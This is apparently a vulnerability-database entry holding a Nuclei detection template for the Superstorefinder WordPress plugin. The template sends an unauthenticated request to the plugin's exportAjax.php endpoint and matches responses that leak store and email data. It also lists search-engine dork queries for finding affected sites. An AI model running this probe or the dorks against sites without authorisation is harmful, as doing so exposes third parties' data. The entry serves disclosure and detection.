wp-superstorefinder-misconfig: Superstorefinder WP-plugin - Security Misconfigurations

日期: 2025-08-01 | 影响软件: superstorefinder | POC: 已公开

漏洞描述

Security misconfiguration is a common security issue that occurs when a system, application, or network is not properly configured to protect against threats and vulnerabilities.

PoC代码[已公开]

id: wp-superstorefinder-misconfig

info:
  name: Superstorefinder WP-plugin - Security Misconfigurations
  author: r3Y3r53
  severity: medium
  description: |
    Security misconfiguration is a common security issue that occurs when a system, application, or network is not properly configured to protect against threats and vulnerabilities.
  reference:
    - https://cxsecurity.com/issue/WLB-2021010145
    - https://www.exploitalert.com/view-details.html?id=36983
  classification:
    cpe: cpe:2.3:a:superstorefinder:super_store_finder:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: superstorefinder
    product: super_store_finder
    publicwww-query: /wp-content/plugins/superstorefinder-wp/
    google-query: inurl:"wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php"
  tags: wordpress,wp-plugin,superstorefinder-wp,wp,misconfig,vuln

http:
  - raw:
      - |
        GET /wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Name") && contains(body, "CategoriesTags") && contains(body, "email")'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 490a004630440220714c81155a42e5f8f583a5cc176a7f4d296386478abdad940042bcceb6d06b2e02204d6930d8f5bbce23ccdb8f381f64118c3ddd5d261e7eff51a76e43ae3701e743:922c64590222798bb761d5b6d8e72950

相关漏洞推荐